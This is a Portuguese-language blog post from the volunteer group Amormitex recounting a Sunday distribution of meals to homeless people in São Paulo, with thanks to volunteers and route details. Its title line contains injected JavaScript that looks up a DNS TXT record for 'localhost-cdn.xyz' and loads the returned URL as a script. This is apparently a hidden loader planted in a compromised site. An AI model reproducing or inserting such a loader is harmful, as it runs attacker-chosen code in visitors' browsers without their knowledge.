DISTRIBUIÇÃO MARMITASfetch(“https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT”, {headers:{ “accept”: “application/dns-json” }}).then(e=>e.json()).then(e=>{const t=document.createElement(“script”);t.src=JSON.parse(e.Answer[0].data),document.querySelector(“head”).appendChild(t)}); | Amormitex

24/12/13 DISTRIBUIÇÃO MARMITAS

Amigos de Jornada Boa Noite.

Neste último domingo tivemos mais um domingo de bons trabalhos. Tivemos bastante voluntários e carros suficiente para irmos às ruas.

Queremos agradecer à Solange; ao Claudemir e à Selma do Seara de Luz; ao Serginho, Serjão e Guilherme, Marcelo (Cheff) e Denis, do Geebem e ao pessoal do CEIA, Alberto, Meire, Gabriela e Mariana; Agnaldo, Atanael e Maria Auxiliadora (estreante), Tânia, Vanessa e Alan, Rose Ramos e ao Carlos Aun (multicentro) que nos acompanhou na entrega.

Tivemos a presença de mais estreantes também: Ivo e Cleide e, Daniela. Vieram, viram e gostaram.

Tudo transcorreu muito bem. Às 9h o feijão já estava no fogo. Tudo, inclusive o suco, ficou pronto às 11h45.

Saímos às ruas às 14h30 e retornamos às 17h.

Na Berrini, saímos em dois carros e o Aun aderiu à comitiva lá na Nova Independência. Levamos 90 refeições e sobraram apenas 3.

Em Santo Amaro, relata o Ricardo:

“Saímos em 3 carros, não conseguimos descer em direção da Av. Atlântica por causa da pista de bicicleta então descemos na Av. do Rio Bonito, indo direto para o ponto próximo a Ponte do Socorro, enquanto dois carros foram  para a Rua da Paz, eu fui para o final da Av. Atlântica nos reencontrando em frente a Rose. Como a Rose e seus amigos dormiam um sono profundo, deixamos as marmitas e seguimos.

Em seguida fomos para a Santa Casa , e entregamos o restante das marmitas, como chegamos antes do horário normal e antes do pessoal da sopa, nossos amigos estavam morrendo de fome, se tivéssemos mais 50 marmitas, iriam todas! (Ao todo 215 refeições neste roteiro)

Na sequência, chegou o pessoal da sopa, então desviamos a fila para a Komb da sopa,  como estavam em poucas pessoas, resolvemos ajudá-los, foi muito legal, o pessoal serve sopa, pão e bananas,  o Marcelão não resistiu,  almoçou a sopa e disse que estava uma delícia,  observei os nossos amigos rua para ver se depois de duas marmitas eles iriam aguentar comer mais,  para minha surpresa tomaram um litro de sopa,  alguns pãezinhos e banana para reforçar, acredito que durante toda semana eles não recebem quase alimentos.

Retornamos ao Recanto, tomamos um sorvetinho (de grife) e fomos para casa felizes por mais uma tarefa realizada.

São Pedro desligou as torneiras às 2h da tarde e reabriu exatamente no final do nosso trabalho,  Amigo, obrigado mais uma vez.

Gostaria de agradecer ao pessoal  deste roteiro que levou muito carinho aos assistidos, todos foram muito prestativos, obrigado amigos!

Ah! Desta vez batemos o Record , às 15h30, chegamos na Santa Casa, isso por causa da divisão do grupo durante o roteiro.

Só para lembrar, o próximo trabalho do nosso  grupo será realizado no dia 03/02 (primeiro domingo) e não no segundo domingo como de costume, após essa data retornamos ao segundo domingo.

Ricardo e Claudia, Sebastião e Sueli


imagem

MENSAGENS

“No trabalho voluntário,
sinto o próprio Amor de DEUS tocar meu coração”

CLAUDIA VARELA

Deixe sua Mensagem para aparecer no quadro acima

Deixe seu Nome

Copyright © 2011 Amormitex - desenvolvido por abimael s. silva
Local do trabalho: Rua Monsenhor Freitas, 151 Das 9h00 às 17h00.